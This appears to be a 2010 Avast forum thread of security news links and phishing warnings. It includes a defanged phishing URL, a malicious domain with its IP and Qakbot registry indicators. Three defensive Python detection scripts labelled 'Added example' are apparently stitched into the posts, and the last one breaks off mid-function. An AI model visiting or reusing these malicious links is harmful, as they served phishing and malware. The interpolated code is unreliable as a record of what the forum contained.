http://www.computerworld.com/s/article/9174998/1_in_10_Windows_PCs_still_vulnerable_to_Conficker_worm?source=rss_news
Romanian police, FBI break up 70-strong eBay fraud ring
http://www.scmagazineus.com/romanian-police-fbi-break-up-70-strong-ebay-fraud-ring/article/167554/
http://garwarner.blogspot.com/2010/04/70-romanian-phishers-fraudsters.html
-
Hello everyone!
I'm new to this forum and to Avast. I'm not sure if I'm posting my query in the right thread, but here goes. I'd be grateful if someone could advise me on how to report a possible 'false positive' to Avast? I've been trying to enter a furniture website here in the UK, but I keep receiving a message from Avast telling me there is a Trojan horse file attached to the shopping cart, thus I always have to abort the connection.
I've telephoned and emailed the furniture company and they admit there was a problem, but they say they've now fixed it. Yet Avast continues to warn me not to enter the site.
Should I put the website url here for someone to check? I won't do this if it's against protocol on this forum. In short, I just need to know how to request a human being at Avast to check whether I'm receiving a false positive?
Thanks in advance for your advice :D
-
Reports related to detections, etc. should go in a new topic in the viruses and worms forum, http://forum.avast.com/index.php?board=4.0. There you can post this information and the URL; change the URL from http to hXXp or www to wXw, to break the link and avoid accidental exposure to suspect sites, thanks.
-
Thanks, will do that. I've now reported the Trojan horse problem to Avast Technical support and hope they won't take too long to reply.
-
I would still go ahead with the new topic as the forums are very active.
-
Hi malware fighters,
More and more malware with destructive payload leave users with a non-functioning PC:
http://blog.webroot.com/2010/04/08/this-pc-will-self-destruct-in-ten-seconds/
polonus
-
sorry Logos, spammer was here but mod must have deleted them- next time I leave it to the mods :)
-
hmm...is yr biznus desperate or something...surely a better place to advertise than here?
???
-
Hi malware fighters,
WordPress bloggers being hacked with shared hosting from Network Solutions: http://wordpress.org/support/topic/385477/page/2#post-1470935
Here it is called a plug-in prob: http://krebsonsecurity.com/2010/04/hundreds-of-wordpress-blogs-hit-by-networkads-net-hack/
pol
-
I have an account at netsol so I will go in tonight and see if I can find anything amiss. I have the WordPress options active (I think), but have never used them from what I can recall - why would I, when I can have WordPress as a standalone with sufficient options to link back to netsol, that is, links that keep source at arm's length from destination. There have been a lot of problems with WordPress recently. Cannot say people haven't had sufficient warnings. And WordPress bundled into netsol...hmm...tonight I stop any active connection for good.
Netsol are unashamedly hard sell, even though they do provide me services at a tenth of the price of what they would cost here in New Zealand (I'm not kidding - $NZ14 per annum spent at netsol for what I'm paying approx $NZ170 per annum here just to own a .co.nz domain, and that's not to use the domain, that's just to own it). But the point is netsol are unashamedly hard sell, they exude business, and you have to watch yr *ss for yrself, cos they're not going to do it for you. That said, their network shield is good, very solid so far, and I feel terribly let down that I haven't received an email notification about this issue. They do crank out emails very regularly, hard sell emails that is, and there really is no excuse for the delay. A warning about the threats, at least, should be mandatory. As a netsol customer I am terribly let down, and feel the negligence reflects on myself as well, as one of their clients. (And just checked - still no email).
Edit - screenshot shows WordPress / MySQL database - now removed
maybe I yapped my mouth a bit early ??? but I just know - I knew back then - at least the forum finally got something to talk about, usually it's just a vehicle to advertise, better go add my piece of nonsense to the rabble ;D
Edit - I was wrong, there was an alert - alerting that I've got a bill that needs to be paid within 30 days ???
-
sorry Logos, spammer was here but mod must have deleted them- next time I leave it to the mods :)
oh OK ;)
-
More: http://blog.unmaskparasites.com/2010/04/11/network-solutions-and-wordpress-security-flaw/
-
thanks Scott, I feel vindicated. I've always felt that the WordPress / MySQL option was a risk. But it must be tempting for some people.
I'm trying to get into the forum discussion at the moment through my standalone WordPress.
oh, it's wordpress.org and my standalone is wordpress.com - they operate separately - has saved me wasting my time.
here's an update on this issue
http://blog.networksolutions.com/2010/update-word-press-issue-fixed/ - fixed (for now)
http://terrywhite.com/techblog/archives/5097 - it's tough at the top, Terry (some good tips and tricks on this domain)
Thanks for the post, Polonus. I've decided to RSS Brian Krebs as a safe measure - no onsite alert from netsol as yet ???
-
Scam Facebook page attracts 40,000 victims seeking Ikea gift card
http://www.computerworld.com/s/article/9175158/Scam_Facebook_page_attracts_40_000_victims_seeking_Ikea_gift_card?source=rss_news
Income tax season spawns Internet spammer scams
http://www.usatoday.com/money/industries/technology/2010-04-12-identitytheft12_ST_N.htm
-
Microsoft to fix 25 holes
http://news.cnet.com/8301-27080_3-20002053-245.html
-
Malware Extorts Cash From BitTorrent Users
A new type of malware is riding the wave of file-sharing pre-settlement letters by infecting BitTorrent users’ machines and then demanding payments in order to make imaginary lawsuits go away. ICPP Foundation try to give the impression they are RIAA and MPAA affiliated but the whole thing is a scam to extort cash and obtain credit card details.
http://torrentfreak.com/malware-extort-cash-from-bittorrent-users-100411/
-
Mozilla has blocklisted all older versions of the Java Deployment Toolkit plugin. I just noticed that the current version in my Java 6U20 installation is Java Deployment Toolkit 6.0.200.2, a version which is newer than those blocklisted, versions 6.0.200.0 and older.
Add-ons Blocklist | Mozilla (https://www.mozilla.com/en-US/blocklist/)
This page lists blocklisted add-ons that should no longer be used with Mozilla products.
...
* Java Deployment Toolkit, versions 6.0.200.0 and older. Reason: security vulnerabilities (see bug 558584 (https://bugzilla.mozilla.org/show_bug.cgi?id=558584)).
This note seems to say a problem is caused by the Java update process, rather than the 1.6.0_20 version of the plugin. I don't see any evidence that the 1.6.0_20 version is problematic.
US-CERT Vulnerability Note VU#886582 (http://www.kb.cert.org/vuls/id/886582)
Note: The installer for Java 1.6.0_20 may not correctly update all instances of the Java Deployment Toolkit plugin. In some cases, the plugin that resides in the \bin\new_plugin directory may not be updated to the fixed 6.0.200.2 version of npdeployJava1.dll. If the new_plugin directory contains npdeploytk.dll version 6.0.190.4 or earlier, then browsers that use plug-ins, such as Mozilla Firefox or Google Chrome, may still be vulnerable. To correct this situation, delete the vulnerable npdeploytk.dll from the new_plugin directory and replace it with the npdeployJava1.dll version from the bin directory.
Please note that the Java Development Toolkit can be installed in multiple browsers, therefore workarounds need to be applied to all browsers with the Java Development Toolkit.
Edit: Updated with US-CERT info.
Mozilla's Add-ons Blocklist page seems to have some incorrect info.
Current version is not blocklisted.
-
There may have been some problems with the Java update process, perhaps in updating to the 1.6.0_20 version.
Chrome Java version
Where I found there was an issue - Vista SP2, Chrome - Secunia found the version to be out of date
- would not update from the Java module in Control Panel
- downloaded 1.6.20 version from Secunia but would not install
- a repeat attempt brought up a dialog box informing that elevation was necessary to update - special case
Also repeated attempts to change the rule from Ask before downloading to Ask before installing were not successful after the rule had been Applied - always went back to the initial setting - this is still the case.
- currently Ask before downloading is the only setting that will Apply
The owner of the computer is not computer literate so I did not pursue what was the brief history
- last attempt to update was 4/4/2010 and that was from 1.6.18 version....so? I'm not sure.
What I did was download the latest version and uninstall the existing version
- then I did an install of 1.6.20 and this was successful
- ran a manual update and process was successful returning message that Java already up to date
Still couldn't change update rule to Ask before install - may need to first change some other setting.
Edit - one of my own computers - XP Pro, Firefox - alerted that the most recent update of Java console 1.6.18 in the browser had not shed the previous version, so I deleted the previous version and tried a manual update of Java in Control Panel - two corrupt downloads before a successful install of 1.6.20, and checked the browser to find that all was now good - will check all my machines; if any problems I will open a new post.
-
Infected XP owners left unpatched
Some of the latest security updates for Windows XP will not be installed on machines infected with a rootkit virus.
...
The latest updates can spot if a system is compromised by the Alureon rootkit and halt installation.
http://news.bbc.co.uk/1/hi/technology/8624560.stm
-
Network Solutions hacked again
More sites hacked : http://bit.ly/9a8nP2
nmb
-
More sites hacked : http://bit.ly/9a8nP2
Could you provide the full URL? In general, I'm not comfortable clicking on shortened ones because they give me no indication of where I'm supposed to wind up.
-
Sorry, that was from twitter.
Here it is : http://blog.sucuri.net/2010/04/network-solutions-hacked-again.html
nmb
-
Thank you for the link, nmb. Interesting stuff. Thank goodness for NoScript and Avast 5 -- and automatic browser and OS updates.
-
Yes I feel very good that I know about noscript and avast. Both are very efficient in blocking such hacks. Huge thanks to both of 'em.
nmb
-
Maybe you need this little Firefox add-on:
http://www.lockergnome.com/bob3160/2010/04/14/the-long-and-short-of-urls/
-
:) google Chrome bookmark
-
That little add-on is reported as only for old versions of firefox when you get to Mozilla's add-ons section and no link to download the .xpi file. It hasn't been updated for some time and not offered for firefox 3.6.3.
-
Hi malware fighters,
Well Trojan now posing as a GoogleChrome extension:
http://www.malwarecity.com/blog/trojan-as-fake-google-chrome-extension-797.html
polonus
-
Network Solutions customers hit by mass hack attack
http://www.theregister.co.uk/2010/04/19/network_solutions_mass_hack/
Network Solutions' security team is battling a mysterious attack that has silently infected a "huge" number of the websites it hosts with malicious code.
The mass compromise affects sites running WordPress, Joomla, and plain-vanilla HTML, according to reports here and here from Securi Security and Stop Malvertising. Many of the infected sites include encoded javascript that secretly attempts to install malware on visitors' computers.
>>> Firefox + NS ;D
-
Hi malware fighters,
A solution for the XSS filter problem in IE8 will be launched next patch round:
http://blogs.technet.com/msrc/archive/2010/04/19/guidance-on-internet-explorer-xss-filter.aspx
polonus
-
1.5M stolen Facebook IDs up for sale
http://www.computerworld.com/s/article/9175936/1.5M_stolen_Facebook_IDs_up_for_sale?source=rss_internet
IDG News Service - A hacker named Kirllos has a rare deal for anyone who wants to spam, steal or scam on Facebook: an unprecedented number of user accounts offered at rock-bottom prices.
Researchers at VeriSign's iDefense group recently spotted Kirllos selling Facebook user names and passwords in an underground hacker forum, but what really caught their attention was the volume of credentials he had for sale: 1.5 million accounts.
IDefense doesn't know if Kirllos' accounts are legitimate, and Facebook didn't respond to messages Thursday seeking comment. If they are legitimate, he has the account information of about one in every 300 Facebook users. His asking price varies from $25 to $45 per 1,000 accounts, depending on the number of contacts each user has.
To date, Kirllos seems to have sold close to 700,000 accounts, according to VeriSign Director of Cyber Intelligence Rick Howard.
social networks ::)
-
Hi malware fighters,
Now also Fx is vulnerable to the newest Zeus version via HTML injection: http://www.scmagazineus.com/new-zeus-version-targeting-firefox-users-for-bank-fraud/article/168455/
polonus
-
Emerging threat reported by Symantec UK:
1100 UK Health Service machines infected with Qakbot:
http://www.symantec.com/connect/de/blogs/qakbot-steals-2gb-confidential-data-week
pol
P.S. Manual removal instructions:
1. Temporarily Disable System Restore (Windows Me/XP).
2. Update the virus definitions.
3. Reboot the computer in Safe Mode
4. Run a full system scan and clean/delete all infected files
5. Delete/modify any values added to the registry.
Navigate to and delete the following registry entry:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\"[LEGITIMATE APPLICATION NAME]" = ""C:\Documents And Settings\All Users\_qbothome\_qbotinj.exe" "C:\Documents And Settings\All Users\_qbothome\_qbot.dll" /c [PATH TO LEGITIMATE APPLICATION]"
6. Exit registry editor and restart the computer.
7. In order to make sure that threat is completely eliminated from your computer, carry out a full scan of your computer using Avast AntiVirus and Antispyware Software like MBAM and SAS,
Damian
-
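The registry step above is easy to get wrong by hand, because the hijacked Run value keeps the legitimate program's name and only wraps its command line. Here is an added example (not from the Symantec write-up or from the poster) that parses each Run value, flags the ones whose executable matches the _qbothome / _qbotinj.exe indicators quoted in the post, and recovers the original command after the /c switch so the entry can be restored rather than just deleted. The indicators are taken as given for this one family; the sample entries and paths are constructed, and on Windows the reader uses winreg while elsewhere it falls back to the sample.

```python
import sys

# Indicators from the removal steps above: the injector lives in an "_qbothome"
# directory, is named "_qbotinj.exe", and chains to the real program with
# "/c <legitimate path>". Assumptions about this one family only.
INJECTOR_DIR = "_qbothome"
INJECTOR_EXE = "_qbotinj.exe"
RUN_KEY = r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run"


def split_cmdline(value: str) -> list:
    """Split a Windows-style command line: double quotes group, nothing else is special."""
    tokens, cur, quoted = [], [], False
    for ch in value:
        if ch == '"':
            quoted = not quoted
        elif ch.isspace() and not quoted:
            if cur:
                tokens.append("".join(cur))
                cur = []
        else:
            cur.append(ch)
    if cur:
        tokens.append("".join(cur))
    return tokens


def _quote(tok: str) -> str:
    return f'"{tok}"' if " " in tok else tok


def analyze_run_value(name: str, value: str) -> dict:
    """Classify one Run value; for an injected one, recover the legitimate command."""
    tokens = split_cmdline(value)
    if not tokens:
        return {"name": name, "status": "empty", "command": value}
    exe = tokens[0].lower()
    if INJECTOR_DIR not in exe and not exe.endswith(INJECTOR_EXE):
        return {"name": name, "status": "clean", "command": value}
    result = {"name": name, "status": "injected", "command": value, "injector": tokens[0]}
    if len(tokens) > 1 and tokens[1].lower().endswith(".dll"):
        result["payload_dll"] = tokens[1]
    # Everything after the "/c" switch is the program the entry used to start.
    switch = next((i for i, t in enumerate(tokens) if t.lower() == "/c"), None)
    if switch is not None and switch + 1 < len(tokens):
        result["restored_command"] = " ".join(_quote(t) for t in tokens[switch + 1:])
    return result


# Constructed sample, not from a real machine; the application paths are hypothetical.
SAMPLE_RUN_ENTRIES = {
    "ExampleApp":
        r'"C:\Documents And Settings\All Users\_qbothome\_qbotinj.exe" '
        r'"C:\Documents And Settings\All Users\_qbothome\_qbot.dll" /c '
        r'"C:\Program Files\Example App\example.exe"',
    "ExampleTool": r'"C:\Program Files\Example Tool\tool.exe" /background',
}


def read_hklm_run() -> dict:
    """Read the HKLM Run values on Windows; elsewhere return the constructed sample.
    On 64-bit Windows a 32-bit Python sees the WOW6432Node view, so check both."""
    if sys.platform != "win32":
        return dict(SAMPLE_RUN_ENTRIES)
    import winreg
    entries = {}
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, RUN_KEY) as key:
        i = 0
        while True:
            try:
                vname, data, _ = winreg.EnumValue(key, i)
            except OSError:
                break
            entries[vname] = str(data)
            i += 1
    return entries


def audit(entries: dict) -> list:
    """Analysis for every entry, injected ones first."""
    rows = [analyze_run_value(n, v) for n, v in entries.items()]
    return sorted(rows, key=lambda r: r["status"] != "injected")


if __name__ == "__main__":
    for row in audit(read_hklm_run()):
        print(row["status"], row["name"], row.get("restored_command", ""))
```

Do the same for HKEY_CURRENT_USER\...\Run and for every user hive on the box; the post only lists the HKLM location. Deleting the value as step 5 says works, but writing `restored_command` back in its place leaves the legitimate application's autostart intact, which is what you want when the wrapped program is the AV itself.
-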
This could be an extensive threat:
http://www.enterprise-security-today.com/story.xhtml?story_id=112003V2043K&page=1&full_skip=1
polonus
-
Hi :)
McAfee update shutting down XP machines. - http://www.engadget.com/2010/04/21/mcafee-update--shutting-down-xp-machines/
Have a nice day. :)
-
Blippy users' credit card info exposed on Google - http://news.cnet.com/8301-27080_3-20003283-245.html?tag=mncol;title
-
Now also Fx is vulnerable to the newest Zeus version via HTML injection: http://www.scmagazineus.com/new-zeus-version-targeting-firefox-users-for-bank-fraud/article/168455/
It's good to know that Zeus isn't transmitted by a Firefox vulnerability. But once you've got it, even Firefox won't save you. Will Avast 5 block this new variant of Zeus?
http://www.scmagazineus.com/new-zeus-version-targeting-firefox-users-for-bank-fraud/article/168455/
In an email sent to SCMagazineUS.com on Wednesday, a spokesperson at Mozilla said that Zeus is not exploiting a vulnerability within Firefox, but is installed once a system has already been compromised.
"Once malware like Zeus is on a user's system, every application they use is at risk," the Mozilla spokesperson said.
Previous versions of Zeus had fairly limited capabilities for Firefox compared to those for Microsoft's Internet Explorer (IE) browser, Boodaei said. On Firefox, for example, the trojan previously was not capable of changing a bank's login page or altering a user's online transactions. As a result, most fraud incidents associated with Zeus have been sustained by users of IE.
-
Hi malware fighters,
Ongoing Twitter Support spam campaign
http://news.softpedia.com/newsImage/Email-Spam-Run-Impersonates-Twitter-Support-Staff-3.jpg/
polonus
-
Not sure if this email was part of a spam campaign - profile of the sender was suspended a few hours later.
I did take the email as genuine, if perhaps a little bent -
did take me to Twitter, where the sender was following my tweets
sender only had three entries, one of which directed the viewer to 'meet the locals', most of whom were showing themselves off in various stages of undress, down to no dress at all. Including the sender I gather, but a girl was visiting at the time, and she informed me that this person - the sender - was not for me at all. :)
And later, the sender's profile was suspended (does that mean withdrawn possibly?). But I think genuine Twitter
btw - I was on Firefox at the time, but the redirects to 'meet the locals' can still be found in my Chrome history (records all browsers), and they are still 'live', and they show the links to be local.
-
Sunbelt Software and Malwarebytes Partner to Improve the Security of the Internet
http://www.sunbeltsoftware.com/Press/Releases/?id=346
http://vipre.malwarebytes.org/
-
Symantec Global Internet Security Threat Report (2009) pdf
http://eval.symantec.com/mktginfo/enterprise/white_papers/b-whitepaper_internet_security_threat_report_xv_04-2010.en-us.pdf
-
Hi malware fighters,
The Blippy service leaked credit card data that could be found on Google: http://venturebeat.com/2010/04/23/blippy-credit-card-citibank/
Be aware with whom you share confidential data...
polonus
-
Not sure whether this has been posted yet. But here goes -
Virus Bulletin - Latest Reactive and Proactive (RAP) test results
http://www.virusbtn.com/index
Efforts to perceptual map prevalence of virus and virus detection
http://docs.google.com/View?id=ah85g3kzb4tn_274cx84gggh
(I don't readily agree with their perception, but I do like Virus Bulletin)
-
Users' passwords exposed by Splunk
http://www.theregister.co.uk/2010/04/26/splunk_passwords_revealed/
Splunk, a kind of Google for business technology that boasts it can help reinforce your security, has exposed the details of major customers to hackers following a web site slip up.
The passwords of customers on Splunk.com were revealed after some debug information leaked on to its production servers. The debug code exposed users' passwords to Splunk.com as clear text, the company said. The site contained the emails and user names customers had used to register with Splunk.
-
Bitdefender warns of malware targeting iPad
http://news.bitdefender.com/NW1497-en--BitDefender-Warns-of-Malware-Targeting-iPad-Users-via-iTunes-Update.html
-
Secunia - Vulnerabilities vs. attack vectors...
http://secunia.com/blog/97
-
Hi malware fighters,
First attempt to launch malcode from within a PDF file without the use of JS:
http://secshoggoth.blogspot.com/2010/04/launch-malicious-pdf.html
There is more to come, be aware...
pol
-
ALL photocopied documents are stored on a hard drive within a hard drive in the photocopier...Potential Risk for information leaks...
:o :o :o :o :o
http://www.cbsnews.com/stories/2010/04/19/eveningnews/main6412439.shtml
Wow, never even knew about this...
-
The most important information there:
How Bullock Kept Her Baby Adoption Secret
http://www.cbsnews.com/stories/2010/04/29/earlyshow/leisure/celebspot/main6443520.shtml?tag=strip
-
India now the primary producer of viruses
I feel bad : http://www.net-security.org/malware_news.php?id=1320 :( >:(
Avast! guys.. you got a bot in India?
nmb
-
From Windows Secrets - Upgrade to IE8 Now, or Face Consequences
http://www.infopackets.com/news/business/microsoft/2010/20100331_experts_urge_upgrade_to_ie8_now_or_face_consequences.htm
-
Hi malware fighters,
Underforge of Lack - R.I.P. Just security prevent everything!
Occasionally have a look here for recent threats: http://www.underforge.net/category/security/
example malicious site xorg*pl
for this threat (we had it in the malicious websites in viruses and worms): www3.workfree36-td.xorg★pl as 95.169.186.25
with Diagnostic pages like this: http://www.google.com/safebrowsing/diagnostic?site=AS:31103
and this http://www.robtex.com/route/95.169.160.0-19.html
Damian
-
Hi malware fighters,
Just to keep a quick check on infested websites via Norton Safe Web, Safety and Threats:
http://forum.avast.com/index.php?topic=59287.msg499672#msg499672
polonus
-
Hi malware fighters,
As this was issued: new Zbot infects through a PDF file; avast did not detect this:
http://securitylabs.websense.com/content/Alerts/3593.aspx
polonus
-
US Air Force phishing test transforms into a problem ;D
http://www.computerworld.com/s/article/9176155/US_Air_Force_phishing_test_transforms_into_a_problem?taxonomyId=13&pageNumber=1
-
File this under:
military intelligence
http://www.oxymoronlist.com/military-intelligence
-
'Extremely severe' flaw in Opera web browser
An “extremely severe” security vulnerability in the Opera browser could put web surfers at risk of remote code execution attacks, the software maker warned today.
http://blogs.zdnet.com/security/?p=6355&tag=nl.e589
The vulnerability, now patched with the new Opera 10.53, affects Opera for Windows and Mac.
-
Hi malware fighters,
Current threats Malware Database - iFrames and Rogue AV hacks: http://malwaredatabase.net/blog/
Current malicious websites reported: http://safeweb.norton.com/safety
polonus
-
Facebook's New Features Secretly Add Apps to Your Profile
http://www.pcworld.com/businesscenter/article/195728/facebooks_new_features_secretly_add_apps_to_your_profile.html
When a piece of software is automatically installed on your computer without your knowledge, it's called malware. But what do you call it when Facebook apps are added to your profile without your knowledge? We discovered Wednesday that this is actually happening, and stopping it isn't as easy as checking a box in your privacy settings.
If you visit certain sites while logged in to Facebook, an app for those sites will be quietly added to your Facebook profile. You don't have to have a Facebook window open, you don't need to be signed in to these sites for the apps to appear, there's no notification, and there doesn't appear to be an option to opt-out anywhere in Facebook's byzantine privacy settings.
-
Fake HSBC emails...
OK, so I got one today that was supposedly from them.
It says that I need to verify some account details, and gives what looks to be a genuine link.
There are some things to note though...
1. It is addressed to my email account, not my name...'Dear abcd@abcd.com...' (not how it would be done if it was really HSBC)
2. I have NEVER banked with HSBC...
These things alone are indicative of a scam email...
Another tell tale sign that it is bad, is that the link doesn't actually go to where it says it goes...
The link looks like it goes to a secure (https) HSBC site, but when you look at it, it actually goes to a .ro website, which is Romanian...so obviously not from HSBC...
This email was correctly caught by the hotmail spam filter, but I still thought it was a good idea to warn about it...
So please leave it in junk and do not open it...
I have also forwarded it to the real bank's phishing address...
EDIT: Another worrying thing is that this is (I think) the first piece of spam that has been sent directly to my exact email address...where did they get it (also the same with a lot of my friends...)
-Scott-
-
Hi malware fighters,
Warn your mother for Mothersday Card malware:
http://ftc.gov/bcp/edu/multimedia/ecards/mom/butterfly/index.html
polonus
-
Hi malware fighters,
The 2007 Storm worm has reappeared in various new variants that differ from the original in specific aspects:
https://www.honeynet.org/node/539
http://www.avertlabs.com/research/blog/index.php/2010/04/28/dark-and-stormy-comeback-of-a-botnet/
and easier to defy than the original Storm worm:
http://www.v3.co.uk/v3/news/2262211/storm-botnet-forming
pol
-
New attack bypasses virtually all AV protection
Researchers say they've devised a way to bypass protections built in to dozens of the most popular desktop anti-virus products, including those offered by McAfee, Trend Micro, AVG, and BitDefender.
The Register (http://www.theregister.co.uk/2010/05/07/argument_switch_av_bypass/)
Original research paper. (http://www.matousec.com/info/articles/khobe-8.0-earthquake-for-windows-desktop-security-software.php)
nmb
-
Hi malware fighters,
Latest Malware Database alerts: http://malwaredatabase.net/blog/
pol
-
Hi malware fighters,
Win7 compatibility tool could be a trojan and malicious downloader:
http://www.net-security.org/malware_news.php?id=1335
polonus
-
U.S. May Face Cyber Attack, Says Richard Clarke
http://topnews.us/content/219583-us-may-face-cyber-attack-says-richard-clarke
-
***
Hack done to phpnuke.org site :
http://forum.avast.com/index.php?topic=59535.msg501749#msg501749
***
-
***
Hack done to phpnuke.org site :
http://forum.avast.com/index.php?topic=59535.msg501749#msg501749
***
looks solved:
http://www.theregister.co.uk/2010/05/11/phpnuke_infection_purged/
-
Windows 7 'compatibility Checker' Is a Trojan
http://www.pcworld.com/businesscenter/article/195991/windows_7_compatibility_checker_is_a_trojan.html
http://news.bitdefender.com/NW1535-en--Windows%C2%AE-7-Compatibility-Checker-Turns-Out-To-Be-a-Trojan.html
-
Fake HSBC emails...
Ok, since that is not working for them, they are trying another angle...pretending to warn users about erm...themselves...
Once again, these are NOT from HSBC, they are fake. The so called hsbc link actually points to:
hXXp://michael-shelton.com/images/uk-hsbc.co.uk/www/INTEGRATION-HSBC/CAM11;jession=14/
Which is obviously fake. (would be interesting to know whether avast! blocks this...)
Another thing is that they have 'tagged' (right word?) it as high priority, as you can see in the image (the red exclamation mark...)
Careful guys...
-Scott-
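Added example, not code from Scott's posts or from HSBC: a small Python script that applies the two tells described above to a link pulled out of a mail, namely that the text shown says one site while the href goes to another, and that the bank's name sits in the path or a subdomain rather than in the registered domain. The display texts and the example.ro target are constructed; the michael-shelton.com href is the one quoted in the thread. The brand list and the two-level suffix table are stand-ins for a real public suffix list.

```python
"""Heuristic checks for one anchor from a suspected phishing e-mail (added example)."""
from urllib.parse import urlsplit

BRANDS = ("hsbc",)  # constructed: brand names to look for outside the registered domain
TWO_LEVEL_SUFFIXES = ("co.uk", "org.uk", "co.ro", "com.au")  # constructed stand-in for the public suffix list


def refang(url: str) -> str:
    """Turn the defanged hxxp:// / hXXp:// / hxtp:// forms used in this thread back into http(s)://."""
    scheme, sep, rest = url.partition("://")
    if not sep:
        return url
    return scheme.lower().replace("hxxp", "http").replace("hxtp", "http") + sep + rest


def host_of(url: str) -> str:
    """Host part of a URL; bare host names such as www.hsbc.co.uk are accepted too."""
    url = refang(url.strip())
    if "://" not in url:
        url = "http://" + url
    return (urlsplit(url).hostname or "").lower()


def registered_domain(host: str) -> str:
    """hsbc.co.uk for www.hsbc.co.uk, example.ro for login.example.ro (toy suffix rules)."""
    parts = host.lower().rstrip(".").split(".")
    depth = 3 if len(parts) >= 3 and ".".join(parts[-2:]) in TWO_LEVEL_SUFFIXES else 2
    return ".".join(parts[-depth:])


def analyze_link(shown: str, href: str) -> list:
    """Findings for one anchor: shown = the text the reader sees, href = where it really goes."""
    findings = []
    target = urlsplit(refang(href.strip()))
    target_host = (target.hostname or "").lower()
    target_reg = registered_domain(target_host)

    # 1. The visible text is itself a URL or host name: does it agree with the real target?
    if "." in shown and " " not in shown.strip():
        shown_reg = registered_domain(host_of(shown))
        if shown_reg != target_reg:
            findings.append(f"text points at {shown_reg} but the link goes to {target_reg}")
        if shown.strip().lower().startswith("https://") and target.scheme == "http":
            findings.append("text shows https:// but the real target is plain http")

    # 2. The brand name sits in a subdomain or in the path, not in the registered domain.
    if target_reg and target_host.endswith(target_reg):
        subdomains = target_host[: -len(target_reg)]
    else:
        subdomains = target_host
    elsewhere = (subdomains + target.path + "?" + target.query).lower()
    for brand in BRANDS:
        if brand not in target_reg and brand in elsewhere:
            findings.append(f"brand '{brand}' appears outside the registered domain {target_reg}")
    return findings


if __name__ == "__main__":
    samples = [  # display texts constructed; the second href is the one quoted in the thread
        ("https://www.hsbc.co.uk/1/2/personal", "http://example.ro/hsbc/login.php"),
        ("https://www.hsbc.co.uk", "hXXp://michael-shelton.com/images/uk-hsbc.co.uk/www/INTEGRATION-HSBC/CAM11;jession=14/"),
        ("https://www.hsbc.co.uk/", "https://www.hsbc.co.uk/1/2/"),
    ]
    for shown, href in samples:
        print(shown, "->", href)
        for finding in analyze_link(shown, href) or ["no findings"]:
            print("   ", finding)
```

The third sample is the control: same registered domain on both sides and no findings. A mail client that hides the href behind the display text is exactly what this check undoes; the "Dear abcd@abcd.com" salutation and the fact that you never banked there remain things only the reader can judge.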
-
they are trying another angle...pretending to warn users about erm...themselves...
;D
-
they are trying another angle...pretending to warn users about erm...themselves...
;D
Yeah...although, I think that sentence needs rephrasing:
Ok, since that is not working very well for them, they are capitalising on it, and trying another angle...pretending to warn users about erm...themselves...
-
Twitter-controlled botnets
http://www.theregister.co.uk/2010/05/13/diy_twitter_botnets/
http://sunbeltblog.blogspot.com/2010/05/diy-twitter-botnet-creator.html
http://www.wired.com/threatlevel/2009/08/botnet-tweets/
A security researcher has unearthed a tool that simplifies the process of building bot armies that take their marching orders from specially created Twitter accounts.
TwitterNet Builder offers script kiddies a point-type-and-click interface that forces infected PCs to take commands from a Twitter account under the control of attackers. Bot herders can then force the zombies to carry out denial-of-service attacks or silently download and install software with the ease of their Twitter-connected smartphones.
-
Warning: http://stopmalvertising.com/malvertisements/alert-twcorpscom-replaces-grepadcom/page-2
pol
-
Hi malware fighters,
Loads of fake av silent download sites being found, example: http://safeweb.norton.com/report/show?name=syspro.edu.co
Discussion on recent website malware: http://evilcodecave.wordpress.com/
interesting link, that I bookmarked...
polonus
-
Discussion on recent website malware: http://evilcodecave.wordpress.com/
interesting link, that I bookmarked...
polonus
Sites that are at February 14, 2010 are about as current as an old newspaper.
-
Top attacks here: http://atlas.arbor.net/
See what is on the malcode radar here: http://www.securitywizardry.com/radar.htm
pol
-
Top attacks here: http://atlas.arbor.net/
See what is on the malcode radar here: http://www.securitywizardry.com/radar.htm
pol
Goes to prove that Chinese with bogus Windows are the major contributors:
CHINANET-BACKBONE
http://atlas.arbor.net/asn/4134
http://atlas.arbor.net/cc/CN
-
Hi malware fighters,
For the latest wepawet Flash and JS reports, go here:
http://wepawet.iseclab.org/samples.php
pol
-
Hi malware fighters,
As you can read via the link given, websites outside the normal Latin spelling, according to the new domain standards, for instance in Cyrillic or Arabic, can be more easily abused by phishers now:
http://www.securelist.com/en/blog/2156/New_domain_standards_new_challenges_new_potential_problems
polonus
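Added example, not code from the Securelist post or from anyone in this thread: a Python script that shows the two things a phishing filter can do with such a domain, decode the punycode so you see what the browser shows, and flag a label that mixes scripts or that maps to a known brand once look-alike letters are replaced. The script heuristic relies on Unicode character names; the confusable table is a small constructed subset of Cyrillic letters that render like Latin ones, and the brand list is constructed as well.

```python
"""Spotting look-alike (homograph) host names in IDN domains (added example)."""
import unicodedata

# Constructed subset: Cyrillic letters that look like Latin ones -> Latin "skeleton" letter.
CONFUSABLES = {
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p", "\u0441": "c",
    "\u0443": "y", "\u0445": "x", "\u0455": "s", "\u0456": "i", "\u0458": "j",
    "\u04bb": "h", "\u04cf": "l", "\u0501": "d", "\u051b": "q", "\u051d": "w",
}
NEUTRAL = {"DIGIT", "HYPHEN-MINUS"}  # first word of a character name that is not a script


def to_unicode(host: str) -> str:
    """Decode xn-- labels so the reader sees what the browser's address bar would show."""
    return host.encode("ascii").decode("idna") if host.isascii() else host


def to_ascii(host: str) -> str:
    """Encode a Unicode host the way it travels in DNS (punycode labels)."""
    return host.encode("idna").decode("ascii")


def scripts_in(label: str) -> set:
    """Script names used in one label, taken from the first word of each character name."""
    found = set()
    for ch in label:
        first = unicodedata.name(ch, "UNKNOWN").split()[0]
        if first not in NEUTRAL:
            found.add(first)
    return found


def skeleton(host: str) -> str:
    """Replace look-alike letters by their Latin twin so the host can be compared to a brand."""
    return "".join(CONFUSABLES.get(ch, ch) for ch in to_unicode(host))


def analyze_host(host: str, known_brands=("paypal.com", "hsbc.co.uk")) -> list:
    """Findings for one host name; known_brands is a constructed list for the example."""
    findings = []
    shown = to_unicode(host)
    for label in shown.split("."):
        scripts = scripts_in(label)
        if len(scripts) > 1:
            findings.append(f"label '{label}' mixes scripts: {', '.join(sorted(scripts))}")
    skel = skeleton(shown)
    if skel != shown:  # at least one look-alike letter was replaced
        for brand in known_brands:
            if skel == brand or skel.endswith("." + brand):
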